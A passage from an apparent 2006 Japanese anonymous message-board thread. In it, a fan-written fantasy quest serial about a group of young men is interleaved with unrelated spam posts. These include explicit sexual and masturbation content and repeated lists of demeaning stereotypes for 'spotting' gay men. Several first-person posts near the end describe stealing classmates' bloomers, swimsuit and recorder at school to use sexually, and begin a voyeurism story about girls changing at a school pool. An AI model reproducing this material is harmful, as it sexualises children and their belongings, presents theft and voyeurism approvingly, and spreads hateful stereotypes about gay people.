ヒラメ「オマイらは甘い!カツンの坊主辺り連れてくればヨカタよ」



マヨ「なんだとー!!!」

141 :ユーは名無しネ:2006/08/29(火) 14:34:52








しょおおおおおおおおおおおおおおお


もなあああああああああああああああああああああああああああああああああああああああ

142 :ユーは名無しネ:2006/08/29(火) 14:35:25










































こいつ馬鹿じゃねーの?????????????????

143 :ユーは名無しネ:2006/08/29(火) 14:53:05
河合「こんなトコで争ってどうするんだよ」



ストロベリー「そうだよ…あれ?なんだこの手紙?」



マヨ「貸せよ…俺宛のラブレだ」



ヒラメ「なになに…今日の夕暮れ時川沿いに来い」




マヨ「まいったなぁ〜」


ヒラメ「怪物リベンジだな」


144 :ユーは名無しネ:2006/08/29(火) 15:38:15






























いいかげんに氏ねくそおもろないねん

145 :ユーは名無しネ:2006/08/29(火) 16:09:20
>144
書くなといいたいのか?

146 :ユーは名無しネ:2006/08/29(火) 17:01:09
ヒラメ「セカーク5人になったが何やら外部から文句が聞こえている」



マヨ「俺抜けるわ」



河合「じゃあ自分も」


鮎「…………」



ヒラメ「少し考えたいと思う」

147 :ユーは名無しネ:2006/08/29(火) 17:13:26
ヒラメ「マヨ…河合…俺達は必ず帰ってくるから」


マヨ「うん…帰って来なかったら許さないから」


河合「待ってるから」


マヨ「行ってこい!オマイら!!!!」



ヒラメストロベリー鮎「はい!!!!!」



こうして3人での出発になってしまったが一体どうなる???

148 :ユーは名無しネ:2006/08/29(火) 17:21:39
ヒラメ「魔法使いがいなくなったorz」


ストロベリー「正直痛いよな」



鮎「ご飯…どうする?」



ヒラメ「やっぱりこーゆう闘いには1人女が必要だ」



鮎「食堂のおばちゃん呼ぶ?」



悩む3人であった

149 :ユーは名無しネ:2006/08/29(火) 17:31:01
ヒラメ「が!しかし!女を入れるとオマイらが更にヌルくなりそうな気がするんだよな」




ストロベリー「俺硬派だから大丈夫だよ」


鮎「う〜ん…」



ヒラメ「わかった!俺が女とペアになってオマイらペアになれ」




ストロベリー鮎「えー」



ヒラメ「俺は女だからと甘やかしはしないからな!」

150 :ユーは名無しネ:2006/08/29(火) 18:50:05
ぽまいらはクソの付いた洗ってない臭いケツマンコを舐めれるか?




俺は臭いクソ付きケツマンコを舐めるのなんかぜんぜん余裕だ!





えっ?なんでわざわさ臭っせぇクソ付きケツマンコなんか舐めるのかって?





151 :ユーは名無しネ:2006/08/29(火) 18:50:40
例えば登山家が困難極める登頂を成し遂げた時に得られる充実感と征服感。






それと同じで誰も舐められない凄んげぇ臭っせぇケツマンコを舐めた時、







最後まで逃げずに舐めきった充実感と相手に対する征服感で満たされる。

152 :ユーは名無しネ:2006/08/29(火) 18:51:19
臭いケツ穴好きの屁理屈を人にグダグ言う奴はただのカスだな。






自分がゲイになったことを人にグダグダ言う奴と一緒で、ただのカス。







もてない君のブサ顔が目にみえる。


153 :ユーは名無しネ:2006/08/29(火) 18:52:02
はい、朝青龍でごわす。





オラの白い、シリコブタ、つこ〜てつか〜さい。





肛門括約筋もつよ〜おまっせ〜。





オリャ〜   ドスコイ ドスコイ ドスコイ ドスコイ。





オリャ〜   ハヨコイ ハヨコイ ハヨコイ ハヨコイ。


154 :ユーは名無しネ:2006/08/29(火) 18:52:36
顔にまたがって、穴舐められながらセンズリするのが好き。




最後は顔にザーメンをどっくどくと、ぶっかけるのが素適。


155 :ユーは名無しネ:2006/08/29(火) 18:53:18
お尻の穴がメチャ痒くて・・・・




アレルギー体質だからたまに玉袋や足や肛門が湿疹出来ることがあるの




その時はステロイド軟膏塗ってます


156 :ユーは名無しネ:2006/08/29(火) 18:53:55
ホモは、目を見ればすぐに判別可能。




独特の、ギラギラした神経質そうな目つき。





次に、まぐろでやってみるとわかる。




かなり若い頃までは、相手が男でも刺激されればイクからわからないけど、




30歳以降になると、男にやられても、刺激でたつけど、イカないか、




なかなかイカないかのどちらか。


157 :ユーは名無しネ:2006/08/29(火) 18:54:31
職場で、なんとなく風貌からこっちの人かなと思っている人がいて、




最近、ちょっと話す機会があった。




それで・・・・最近行ったコンサートは、6月にマッキー、8月に明菜で、来月は




マドンナに行くっていってた。




みごとにゲイアイコンが並んだ。


158 :ユーは名無しネ:2006/08/29(火) 18:55:16
ホモってノンケと違って、無造作にぱっと脱いで上半身裸になったり出来難い。




男の裸に独特の思い入れがあり、男の裸=SEXと結びつけるから、あの人に





なら見られてもいい、とか女には見られたくない、とかいちいち考えてる。




だから、宴会芸で公衆の面前ですぐ裸になったり、場合によってはチンポ




見せたりする奴に滅多にホモはいないような気がする。


159 :ユーは名無しネ:2006/08/29(火) 18:55:51
俺のノンケ友達はくんにだけはできないって言ってたけど



だからマンコ事態がぐろいから裏よりモザイクあってくれたほうが嬉しいって



けっこうこういう意見おおい




160 :ユーは名無しネ:2006/08/29(火) 18:56:22
ピチピチのズボン穿いて、露骨に右チンしている人はゲイっぽいね。




きっと他人に見せつけたがりで、また、触って欲しい願望もあるはず。




キャップ被って目線を隠し、通勤電車の車内で前に立った他人の股間を




ずっと凝視して観察してそうだな。


161 :ユーは名無しネ:2006/08/29(火) 20:47:48
ピー


ストロベリー「無線だ」



ヒラメ「はいよー」



(マヨ&河合)「お前らなんだよ!俺達が抜けたらまた人を加入させるわけ?」



ヒラメ「河合がいなくなったから料理してくれる人を入れるんだよ」


ストロベリー「お前ら抜けたくせにいちいちうるせえよ」



バシッ!




ヒラメがストロベリーを扇子で叩いた

162 :ユーは名無しネ:2006/08/29(火) 20:51:39
ヒラメ「加入者は責任持って俺が連れてくる」



鮎「楽しみだね」




ストロベリー「どんな人かな」




ヒラメ「ストロベリー…オマイが来る時もそうやってみんなワクワクしてたよ」




ストロベリー「ありがとうございます!」




そして夜も更けた

163 :ユーは名無しネ:2006/08/29(火) 21:00:21
ホモってノンケと違って、無造作にぱっと脱いで上半身裸になったり出来難い。




男の裸に独特の思い入れがあり、男の裸=SEXと結びつけるから、あの人に





なら見られてもいい、とか女には見られたくない、とかいちいち考えてる。




だから、宴会芸で公衆の面前ですぐ裸になったり、場合によってはチンポ




見せたりする奴に滅多にホモはいないような気がする。



164 :ユーは名無しネ:2006/08/29(火) 21:00:52
はい、朝青龍でごわす。





オラの白い、シリコブタ、つこ〜てつか〜さい。





肛門括約筋もつよ〜おまっせ〜。





オリャ〜   ドスコイ ドスコイ ドスコイ ドスコイ。





オリャ〜   ハヨコイ ハヨコイ ハヨコイ ハヨコイ。


165 :ユーは名無しネ:2006/08/29(火) 21:03:24
その夜


ストロベリー「河合とマヨ残念だったね」



鮎「仕方ないよ…でも常に無線で繋がってるからいいじゃん」




ストロベリー「次の人どんな人だろうね」




鮎「仲良くしてあげなきゃね」




ストロベリー「俺もヒラメの紹介で次の人もヒラメの紹介だよ(w」



鮎「もう寝よっか」




おやすみ

166 :ユーは名無しネ:2006/08/29(火) 21:05:59
例えば登山家が困難極める登頂を成し遂げた時に得られる充実感と征服感。






それと同じで誰も舐められない凄んげぇ臭っせぇケツマンコを舐めた時、







最後まで逃げずに舐めきった充実感と相手に対する征服感で満たされる。



167 :ユーは名無しネ:2006/08/29(火) 21:06:42
○ 一般的にドスコイ体型である。



○ 瞼がふくれ、奥二重である。



○ 首をいつも、かしげている。(斜頚か?)



○ ケツの割れ目が深い。



○ ノンケと比較すると肛門のヒダが肉厚で肥厚している。



○ 銭湯に行くと、しゃがんで自慢の肛門を披露したがる。


168 :ユーは名無しネ:2006/08/29(火) 21:07:16
・ 一斉に視線を浴びた時、妙に気取った歩き方をする。





・ 片足に重心を置いて静止することが多い。





・ 顔は正面を向いているのに目だけがこちら側に向いている。





・ 男性モデルのような動作、しぐさをする。





169 :ユーは名無しネ:2006/08/29(火) 21:07:48
・ 椅子に座った時、膝をぴったり、くっつけているが、
  時々、思い直したように慌てて開脚する。



・ 鍛えた大殿筋を誇示するように上下、左右、前後にモコモコ動かして歩く。



・ 胸の筋肉を強調するために、薄い生地のシャツを愛用する。




・ 顎を前方に突き出して歩く。

170 :ユーは名無しネ:2006/08/29(火) 21:08:29
仕事中遠くの席なのに良く目が合う同僚が居るんだけど
どっちだろ?



俺は気になってるというか、タイプだからついつい目が行くんだけど



視線が合う事が多いし、帰り道で偶然合流する事があるんだよね



トイレでも一緒になること多いし



告ってみても大丈夫だろうか?


171 :ユーは名無しネ:2006/08/29(火) 21:41:38
早朝


ヒラメ「えーと今日から新しく仲間になる沙紀さんだ」



沙紀「よろしくお願いします」




ストロベリー「よろしく36」



鮎「うわ…ストロベリー最悪」




ヒラメ「いいかオマイらー!!!たるんでんじゃねー!!今日は沙紀も含め4人であの山のテッペンの悪魔を倒しに行く!」





ストロベリー「自衛じゃなかったのかよ…」

172 :ユーは名無しネ:2006/08/29(火) 21:45:35
古典的だけど確実に見破る方法は、





いつも男子を目で追ってることが多いのはゲイ






女子を追ってるのはノンケ





両方ならバイかと。







以前、俺に告白した後輩がたまたまキャンパスのベンチに座ってるのをみつけて観察したら、







やっぱあいつのタイプが通るたびに反応してた

173 :ユーは名無しネ:2006/08/29(火) 21:46:18
男に「お前ホモ?」と言われたことはないが、女には数回ある。



やつらやっぱり鋭いよ。下心全くないのを見抜かれてるのか。




友達に告白とか、やめたほうがいいぞ。



気持ち悪がられて一生疎遠に、



悪ければ、翌日学校中に言いふらされる。



早くゲイデビューして、そっちで彼氏作るほうが安全かつ確実。


174 :ユーは名無しネ:2006/08/29(火) 21:55:24
鮎も沙紀と挨拶をし山へ向かう事になった



ヒラメ「ストロベリー!カンフー衣装で行け!俺は赤服で行く」



ストロベリー「へい!」



鮎「俺だけ戦闘衣装がなーい」



沙紀「沙紀もないんだけど…」




ヒラメ「我慢しる!」


175 :ユーは名無しネ:2006/08/29(火) 22:06:32
ピー(無線)


(マヨ)「つーかテッペン着く迄に体力消耗じゃね?」



ヒラメ「そーゆう甘い事をいちいち無線で言うな!」


(河合)「頑張ってねー」



鮎「ありがd」



沙紀「誰なの?」




ストロベリー「全く関係ないヤシラだよ」



ヒラメ「先日迄俺達と一緒に闘った大切な仲間だよ」

176 :ユーは名無しネ:2006/08/29(火) 22:10:51
中学の頃からの付き合い(今はお互い22)のヤツがいるのだけども、



そいつがゲイなのかノンケなのか判断付かなくてどーにも困っている・・・




・一応、女性が好きだと言っている。タイプもあるらしい・・・けど忘れた。




・ゲイな人間は特に気にならない、との事。知り合いにも居るらしい



・うちに泊りに来るときは、いつも同じベッドで寝る。



 中学の頃、最初に来たときそいつ用に布団を敷こうとしたら




 「別にこのベッドで二人寝れるだろ」と言って拒否。以降慣れでずっとそのまま


177 :ユーは名無しネ:2006/08/29(火) 22:11:31
・中学の頃に、自分がホモだと疑われた事がある。その時はかなり苦しい事になった。



 が、それ以降はまったく何も言ってこない。何か扱いが変わったという感じも無し。



・突然、抱きついてくる事がある。



・しかし、自分がゲームをやっているとキャラクターを見て「ロリコン」と言ってくる。高校の頃から。




本当にゲイなら、逆に一緒に寝たり抱きついてきたりってしない様な気もするんだよねぇ。



でも、ノンケがホモだと疑った人間と一緒に寝ようとするのかな、と考えるとこれもまた・・・。



ロリコン、とはよく言われる。それでかなりからかわれる。その辺も考えると・・・やはりノンケ?


178 :ユーは名無しネ:2006/08/29(火) 22:14:10
ゲイには理解あるといっても、ノンケがゲイから、




自分の事を恋愛対象として見られていると知ったら流石に引くと思う。




そいつの事は本当に好きで絶対離れたくないから、カムアウトする勇気がない。




だけど、そろそろ我慢の限界。・・・誰か意見、求むorz


179 :ユーは名無しネ:2006/08/29(火) 22:32:09
沙紀「ストロベリーちゃんは冗談が好きなんだね」



ストロベリー「はい!」



ヒラメ「何が冗談だよ…悪意こもりまくりだろ」



沙紀「鮎は特技はあるの?」



鮎「う〜〜〜ん…すぐ寝れること?」



ヒラメ「俺はサッカー!」



ストロベリー「私は歌にダンスにアクロバットにと沢山あります!」




沙紀「今度是非歌って下さいね」




ストロベリー「承知致しました!」

180 :ユーは名無しネ:2006/08/29(火) 22:39:58
・中学の頃に、自分がホモだと疑われた事がある。その時はかなり苦しい事になった。



 が、それ以降はまったく何も言ってこない。何か扱いが変わったという感じも無し。



・突然、抱きついてくる事がある。



・しかし、自分がゲームをやっているとキャラクターを見て「ロリコン」と言ってくる。高校の頃から。




本当にゲイなら、逆に一緒に寝たり抱きついてきたりってしない様な気もするんだよねぇ。



でも、ノンケがホモだと疑った人間と一緒に寝ようとするのかな、と考えるとこれもまた・・・。



ロリコン、とはよく言われる。それでかなりからかわれる。その辺も考えると・・・やはりノンケ?


181 :ユーは名無しネ:2006/08/29(火) 22:40:52
トートとか買い物袋を肘を直角にしておばさんみたく持つ
物腰柔らかい
バイバイを脇を締めてする
両手でバイバイをする



会話中手が頬にある




襟を弄りながら話す


タイプの男と会話中髪を弄る


タイプの男と会話中舌がペコちゃんみたくなる



下唇をかむ口をとんがらすのが可愛い表情と思っている



ルーシーリューが好き



たまにモデル歩きをする

に当てはまってたらゲイ


182 :ユーは名無しネ:2006/08/29(火) 22:41:48
1.両方に対して甘かったと思う。




2.それはまぁ好きだったけど、凝視とかはしないようにしてたなぁ。





3.話し掛けられたら会話できることはできた(ただし、自分からは話し掛けることは無かった)





4.身振り手ぶりは昔から変わらず、大雑把でのっそりと正反対




5.中学のころはそれ以前に知らなかった。高校の頃は知っていたけど、そんな単語か出るような話題はしなかったはず




6.多少童顔入っているけど、体格はどちらかといえばゴツイ方。髪は短髪。ついでに毛深い。



183 :ユーは名無しネ:2006/08/29(火) 22:43:31
山も真ん中まで来て次第に口数も減っていった



鮎「もしもし〜河合?」



(河合)「どうした?」



鮎「きついよ〜」



(河合)「その辺で休んどけよ」




鮎「それがさ〜オマイとマヨがいないから『きつい』とか言える相手がいなくて辛い」





(河合)「沙紀に言ってみろよ」





鮎「や〜だよ〜」

184 :ユーは名無しネ:2006/08/29(火) 22:44:51
男に「お前ホモ?」と言われたことはないが、女には数回ある。



やつらやっぱり鋭いよ。下心全くないのを見抜かれてるのか。




友達に告白とか、やめたほうがいいぞ。



気持ち悪がられて一生疎遠に、



悪ければ、翌日学校中に言いふらされる。



早くゲイデビューして、そっちで彼氏作るほうが安全かつ確実。


185 :ユーは名無しネ:2006/08/29(火) 22:46:04
【うつオナガイド】

■ペニスの状態。



・柔らかい状態で始め、徐々に勃起。摩擦、もしくは圧迫させ射精に導く。



・勃起させずに、柔らかいまま摩擦、もしくは圧迫で射精に導く。



■ペニスの向き。



・ペニスは上向き(へそ側)の状態でする。(勃起させる場合はこれが多い)



・ペニスは下向き(太もも側)の状態でする。(勃起させない場合は可能)


186 :ユーは名無しネ:2006/08/29(火) 22:46:42
■オカズ


・想像のみ。


・エロ雑誌、映像などを見ながら。



■刺激を与える物。



・柔らかいベッドやクッションなど。(痛みが少ない)



・かたい床など。(勃起させると痛い)



■鬱オナの利点。



・セックスに負けない肉体的な快感。


187 :ユーは名無しネ:2006/08/29(火) 22:54:11
鮎「戻って来いよ〜」


(河合)「嫌だよタリィ」



鮎「鮎河合マヨで組んで〜ヒラメストロベリー沙紀ちゃんで組めば問題茄子だって」




(河合)「なるほどな〜」




鮎「だろ?セカークオマイら頑張ってきたのに消えて欲しくないよ」





ヒラメ「鮎!!!!!何一人で……コラー!!!!無線で遊ぶなー!!!」

188 :ユーは名無しネ:2006/08/29(火) 22:57:48
鮎「ヒラメ…この山の闘いが終わった後聞いてほしい話があるんだけど」




ヒラメ「わかったから今はガンガレ」





ストロベリー「鮎も脱退したいとか?」




鮎「違うよ」




ヒラメ「脱退は認めないぞ…ベジータに勝てねえだろ」

189 :ユーは名無しネ:2006/08/29(火) 23:02:09
■鬱オナの問題点。




・実際のセックスでイキにくくなる。




■重要なポイント



・射精時にペニスを圧迫し、無理に射精を止めるのは体に良くない。




・女性とのセックスを楽しみたいなら、



なるべくセックスに近い形での鬱オナをする。




(勃起させずに、かたい床で、圧迫させ射精するなどは、




セックスと違いすぎるため、イケなくなる場合がある)


190 :ユーは名無しネ:2006/08/29(火) 23:03:32
私はうつオナのスペシャリストです、幼稚園のころからはや27年間




うつオナが大好きです、だがうつオナのおかげで、火星人になってしまい




後悔しておるしだいでございます、でもうつオナサイコーです、





私の場合は、物は下向きで床や枕にコスルのではなく手でもみもみする





のです、ふにゃちんですが、かなりきもちいですよ、いつでもテレビを見ていても





自然とうつ伏せになっててでもにもに、自然なながれでおなっています。


191 :ユーは名無しネ:2006/08/29(火) 23:04:13
全身運動と妄想で理想の女性と正常位でしてる感覚になれる。




終わった後も心地よい疲労感につつまれそのまま熟睡。





手とsexだとこの満足感はなかなか得られないんだよなあ。


192 :ユーは名無しネ:2006/08/29(火) 23:05:01
休日の前とかオールナイトで時間かけてオナるにはうつオナの方が




良いです。手だとすぐ出したくなってしまうので。





皆さんに質問ですが、うつの体勢でエロ画像見るのにパソコンは





どこに置いてますか?枕の上に置くと首が痛くなるのですが。


193 :ユーは名無しネ:2006/08/29(火) 23:58:04
ヒラメ「なんかおかしいな…おいストロベリー沙紀!オマイら二人先に行け」



ストロベリーと沙紀は二人で登り始めた



ヒラメ「どうした鮎?」



鮎「河合と…マヨが…戻ってきてほしい………」


194 :ユーは名無しネ:2006/08/30(水) 00:02:56
ヒラメ「なに言ってんだよ今更」




鮎「わかってる…」




ヒラメ「あれだろ…弱音を言い合える相手がいなくなって精神的にきついんだろ」





鮎「…………」




ヒラメ「甘い事言い合ってズルズル足引っ張り合いながらやっていける程生ヌルイ世界じゃないんだぞ!」




鮎「うん」





ヒラメ「沙紀はどうするんだよ…魔法使いのフミの変わりに来てんだぞ?既に」

195 :ユーは名無しネ:2006/08/30(水) 00:03:29
俺はデスクトップPCの画面の底辺が床から80cmの所にある。そこからマウスだけ伸ばして




相当エビゾリになってるわけだけどべつになんともない。




ちなみにテレビは床から50cmくらい。




たぶん慣れればいわゆる伏臥上体反らしが得意になってなんともなくなるんだと思う。


196 :ユーは名無しネ:2006/08/30(水) 00:04:07
小学生のころからうつオナしていたせいか、





ちんこの形が変になってしまった。





勃起すると下腹部にくっつきそうなくらいに反っている。





水平にしようとしても痛くて無理。





過去ログを見たら似たような人がいるんで質問したいんだが


197 :ユーは名無しネ:2006/08/30(水) 00:04:57
手で揉むってのは、手をどこに置くの?






チンコの下?







俺は手で揉まないでうつオナするんだが。


198 :ユーは名無しネ:2006/08/30(水) 00:09:07
鮎「ごめん…俺が悪かった」



ヒラメ「行くぞっ!頑張るぞー鮎!!」




鮎「うん」




ヒラメ「おーい!オマイら悪かったな!先行かせて」



ストロベリー「どうだった?」




ヒラメ「大丈夫だ!問題無し!」

199 :ユーは名無しネ:2006/08/30(水) 00:09:43
安田美紗子って乳首が結構でかいよな。





ローション塗られただけで、水着の上からでもわかるくらい








乳首がおったってるのわかる。


200 :ユーは名無しネ:2006/08/30(水) 00:10:29
俺がうつオナし始めたのが、10歳くらい。





それから8年間、初挿入までずっとうつオナ。つーかそのあとも2年ほどうつオナだったが。





結論から言うと、膣内で逝けなくなるとは断言しないまでも、間違いなく逝きにくくはなるだろう。





あまりに布団や床の感触に慣れ、うつぶせ状態による重圧に慣れてしまったら、





もう脳がその感触を覚えてしまい、それでしか逝けなくなる。




そもそもうつオナって、前立腺を無理矢理刺激してるような感じだしな・・・キモチイイに決まってる。


201 :ユーは名無しネ:2006/08/30(水) 00:11:03
こうなると、いざ本番って時に、あまりの感触の違いに萎えることが殆どだろう。




膣の中って、よっぽどかずのこ天井でもない限り、初めてのときは拍子抜けすると思う。




うつオナに慣れた人間からしたら、うつおなの刺激>>>>>膣のしまりだ。




ただ断言しないのは、セックスという行為(膣挿入含む)の快感ってのは、




精神面に非常に大きく左右されるから。




まぁうつ慣れしてたら、大抵はマンコの中じゃ逝けない。





早めに手→緩めのオナホというふうに矯正していくことをオススメする。


202 :ユーは名無しネ:2006/08/30(水) 00:11:50
これが原因でカセイホーケイなのは間違いない。





普段はムケルけどこの時は亀頭を皮で包んで






絨毯の床にひいた紙のその上でやってそのまま射精









203 :ユーは名無しネ:2006/08/30(水) 00:16:25
鮎「沙紀ちゃんごめんね」



沙紀「????」




鮎「さあ登ろう!!」



ストロベリー「なんかいいな!4人で行くぞー!」




ヒラメ「よーしオマイら進めー!!!!」


204 :ユーは名無しネ:2006/08/30(水) 00:28:58
ストロベリー「敵は悪魔だからね」



ヒラメ「河合がいないのは痛い…魔法がなくて悪魔に勝てるか…」





鮎「やれるとこまでやろう」




沙紀「沙紀もやるから」



4人は悪魔の存在に少しビビりつつ登っていく

205 :ユーは名無しネ:2006/08/30(水) 00:33:03
ヒラメ「いよいよ頂上だ…」



沙紀「あのお城に悪魔が…?」




鮎「不気味なお城だな」




ストロベリー「なあ…盗めるものは…」



バシッ!!!!




ヒラメがストロベリーを扇子で叩いた

206 :ユーは名無しネ:2006/08/30(水) 00:37:06
4人はこっそりお城に入った



鮎「侵入だよ…訴えられないかな」




ヒラメ「それはない」



敵1「何をしている」




ストロベリー「スミマセンスミマセン」




ヒラメ「お前らのトップ『悪魔』が西の都を襲ってめちゃくちゃにしているらしいな」





敵2「なんだ?」




ヒラメ「やるぞ!!!」




闘いが始まった

207 :ユーは名無しネ:2006/08/30(水) 01:21:19
ヒラメと敵の剣同士の闘い



ヒラメの顔に剣が刺さる



ヒラメ「ふざけやがってー!!!!」



鮎ストロベリーは敵の背後から蹴りを入れ一瞬敵はよろめく




敵の剣がストロベリーの腕をかする




ストロベリー「草!草!」




208 :ユーは名無しネ:2006/08/30(水) 01:29:19
敵は沙紀の方にも来た


ヒラメ「やめろー!!!!!仲間をやるなら俺をやれー!!!!」




ストロベリーの周りに突然凄い竜巻が起こり…




ストロベリーが叫ぶと同時に竜巻に飲み込まれた敵は一瞬にして消えた




鮎「なんだったの?今の…」

209 :ユーは名無しネ:2006/08/30(水) 04:22:28
 手コキでも亀頭をむくようにしてやらないとホーケイになるよ。





うつぶせでやる場合も亀頭を皮で包んでするのをやめて亀頭を出すようにして






と行うとホーケイにはなりにくいよ。




 皮をむいて行う場合、亀頭が敏感で痛みがある場合はシルクサテンのような




なめらかな布にこすり付けるようにして、その下には柔らかいスポンジなどを





置くとキモチイイよ。


210 :ユーは名無しネ:2006/08/30(水) 04:23:02
人生で鬱オナしかしたことなくて、




最近手で試してみたんだが1時間ぐらい粘っても逝けずあきらめて、




それから4時間ぐらいしてトイレに逝ったら、






俺のものがぶっくら腫れあがってたorz





手は危険だと思った。






誰かタスケテ


211 :ユーは名無しネ:2006/08/30(水) 04:23:45
うつオナは、いろいろ試したオナニーのなかで最強





やり方は、チムポを上向きにしてクッションに擦り付け





チムポをクッションに擦り付けながら上下、左右に動かしてる






オナニークッションは、弾力のあるスポンジクッションがイイよ






中身がぽり綿のクッションは、綿が偏っていまいち


212 :ユーは名無しネ:2006/08/30(水) 04:24:21
オナヌー覚えたての頃は手コキでもなかなかの快感を得られたけど、慣れてくると








確かに放尿するときの感覚とあまりかわらなくなってくる。。







その点鬱オナはいつまでたっても気持ちいい!


213 :ユーは名無しネ:2006/08/30(水) 08:49:08
ヒラメ「ストロベリー大丈夫か!!」



ストロベリー「何が起こったの?」




鮎「覚えてないの?」



ストロベリー「敵が沙紀の方に言ってヒラメが叫んだとこまではわかる」




ヒラメ「ストロベリーは凄いパワーが隠れてるとみた」



ストロベリー「????」

214 :ユーは名無しネ:2006/08/30(水) 08:54:58
ヒラメ「沙紀大丈夫か?」



沙紀「どうにか…びっくりした…」




ヒラメ「最終目標のベジータはあんなもんじゃないからな」






ストロベリー「ジャニVSベジータだから沙紀はもしかしたらベジータとの闘いは無理かもしれないよ」





ヒラメ「そうだった!!!!!!なんてことだ…orzすっかり忘れてた」






しかしココは大きな城だ…






目の前は壁で塞がっている

215 :ユーは名無しネ:2006/08/30(水) 09:14:59
ヒラメ「壁っていうか崖だな…これを越えなきゃならないわけか」




鮎「落ちたら最悪じゃね?」




ストロベリー「ヒラメと沙紀は先に登りなよ」





鮎「黄色雲で行こうよ」




ヒラメ「アレは皆が皆乗れるわけじゃ茄子」





鮎「俺乗れたよ?」

216 :ユーは名無しネ:2006/08/30(水) 10:28:57
鮎「わかったよ登ればいいんでしょ」



ストロベリー「ヒラメ沙紀!しっかり登れよ?」



ヒラメ「エラソーに言うんじゃねえ」





沙紀「崖が崩れそう…」



この崖は決して丈夫ではなさそうだ



217 :ユーは名無しネ:2006/08/30(水) 13:22:08
ストロベリー「もうあんな上まで行っちゃったな…ヒラメ」




鮎「つーか沙紀ちゃんの事もうちょっと待ってあげればいいのにあいつ」






ストロベリー「ムリムリ(w『オマイらー!甘い事言ってんじゃねー!』って言われるよ(w」






鮎「俺達も登ろう!」

218 :ユーは名無しネ:2006/08/30(水) 13:56:13
ストロベリー「沙紀ー!すぐ行くからねー!」




鮎「つーかキツイ…orzヒラメってヤパーリ凄いわ…」




ストロベリー「マジ崩れそうだよ…」




わあああああああ!!!!!!!!!!





その時!ヒラメの所の崖が崩れヒラメ落下!





続いて沙紀も落ちストロベリーと鮎も崖崩れの下敷きになってしまった

219 :ユーは名無しネ:2006/08/30(水) 13:57:11
あげ

220 :ユーは名無しネ:2006/08/30(水) 14:08:08
ヒラメ「うぁぁぁあああ!痛い!痛い!」



ストロベリー「ヒラメに草を…でも痛くて動けないよ」





ピー (無線)


(マヨ)「薬草持ってすぐ向かう」




鮎「頼む…」



沙紀「どうなっちゃうの…」




ヒラメ「うわああああ!!!!痛い!」





鮎「マヨ早く!!!!」

221 :ユーは名無しネ:2006/08/30(水) 14:28:10
マヨ「持って来たぞ!液状にしてきた」




ストロベリー「ありがd」




マヨ「飲めばすぐフカーツするはずだ」




ゴクゴク…





ヒラメ「あ゛〜〜〜マジびっくりした〜〜〜」





鮎「ヒラメ!!!よかった〜俺達にも少しわけて」




皆薬草を飲みフカーツした

222 :ユーは名無しネ:2006/08/30(水) 14:28:59
美術の先生、35歳ぐらいでおっとりした優しい女の先生。




綺麗な方で高校が男子だけだったら女に飢えてた。






それで体育サボった時間トイレで先生のことを思い出して無性にムラムラして






裸状態になってペニスをしごいて射精しちゃった。







先生の繊細な手でしごかれてると想像したり、先生を机に押し倒して








犯すシチュエーションを想像したりしてオナニーしたよ


223 :ユーは名無しネ:2006/08/30(水) 14:29:46
学校のオナニーといえば、まず女子のブルマーだよね




部活帰りの放課後、教室にふと立ち寄り好きなこのロッカーに目をやると





今日の体育で使った体操服、そして奥には紺色に輝くブルマーが・






周りに誰もいないことを確認し、手に取り感触を確かめる・





次に軽く匂いをかぐ。物音がしてあわててバックに詰め込む





気のせいかふー、そのまま落ち着くためにトイレへ。


224 :ユーは名無しネ:2006/08/30(水) 14:31:55
小をして、ふと個室に入り鍵を閉めブルマを取り出す。



はあはあ、憧れのあの子のブルマ。あそこに鼻を当ておもいっきり息を吸い込む




汗とあそこのにおいが混じり、なんともいえない興奮が。




次の瞬間あそこの部分を裏返し軽く舐めてみた。




ああ、なんだこれは、甘くていいにおいで、あの子のあの部分を想像しながら




しごき始める、いきそうになりぶるまで包み込んで最後のフィニッシュ。




あそこの部分が真っ白に、はっとわれに帰った僕は、そのままの状態でブルマをロッカーに戻しておいた




次の日の体育の時間彼女は気づかなかったのかそのブルマーをはいて元気に運動してた。


225 :ユーは名無しネ:2006/08/30(水) 14:32:39
小学のころに、移動教室で誰もいなくなった教室に忘れ物をしたと言い、向かった。




もちろん目的は2時間前に着て濡れたスクール水着。




好きだった子のビニールバックを即座に開け、中からタオルに包まれじっとり濡れたスクール水着を取り出した。




そして、そのスクール水着を比較的ばれずに帰りまで保管する方法を考えた。




幸運にも自分のビニールバックの中にあったビニール袋に包み丁寧にタオルにくるみ自分のバックの中へ。




漏れはあらかじめおいておいた筆箱を手に教室へ戻った。


226 :ユーは名無しネ:2006/08/30(水) 14:33:09
数時間後。




暑い日差しの中、家に全力疾走し、ビニールバックを洗濯物を入れるかごへ。




バックの中からビニール袋に包まれたスクール水着を部屋にもちこみ、




塩素の匂い漂う、しめったスクール水着を漏れは思う存分端から端まで、タグにいたるまで嗅ぎ、





漏れは服を脱いだ。





下半身の疼きを感じまだ名も知らぬ行為に耽る。






出た白濁液をティッシュに拭きとり、漏れはスクール水着のなかに足を…入れた


227 :ユーは名無しネ:2006/08/30(水) 14:38:29
マヨ「どうして黄色雲使わないの?宝の持ち腐れだよ」





ストロベリー「乗りたい!」




ヒラメ「ダメだ!そうやってラクな方にラクな方にいくな」





マヨ「ちょっと厳しすぎない?まあ俺はもう戻るけどさ…」




そう言ってマヨは戻っていった




ヒラメ「さあ続きだ…バテるなよ?オマイら」





ストロベリー鮎沙紀「はい!」

228 :ユーは名無しネ:2006/08/30(水) 14:44:02
あとは、レオタード、テニスウェア、とか




中のときは、放課後に好きな子のたてぶえをもってトイレに行き






匂いかいだり舐めたり、しながらしこって。





フィニッシュで口あたる部分にかけてそっと戻しとく。





次の日の音楽の授業で俺のがついたとこを加えたときは興奮した。





1瞬変な顔したが、まじめな子だったからそのまま続けて。





まるでFされてるような気分になってしまった。


229 :ユーは名無しネ:2006/08/30(水) 14:44:47
あと高校のときにしたのは、夏のテスト期間の放課後。





テスト期間中は部活禁止で放課後は誰もいない。プールは授業中以外に入るのは禁止。





だけど暑いからこっそりと入ってる子はたまにいた。





うちの学校はいなかでプールが校舎から運動場をはさんで先にあって





そこに更衣室があったんだけど、古い学校だったからシャワー室と更衣室が一緒になった






倉庫みたいなとこだった。周りには木が生え塀があったのでひとがいてもわからない。


230 :ユーは名無しネ:2006/08/30(水) 14:45:44
そんなある日、俺が帰ろうとしてたら、こそこそと同級生の女の子たちがプールのほうに向かってる





よく見ると、かわいいといわれてるこのグループだ。





俺はそのまま帰ろうと思ったが、水着姿を見たい衝動にかられこっそりと





プールのほうにちかずいた。物陰に隠れて待つとしばらくして女の子たちが更衣室から出てきた。





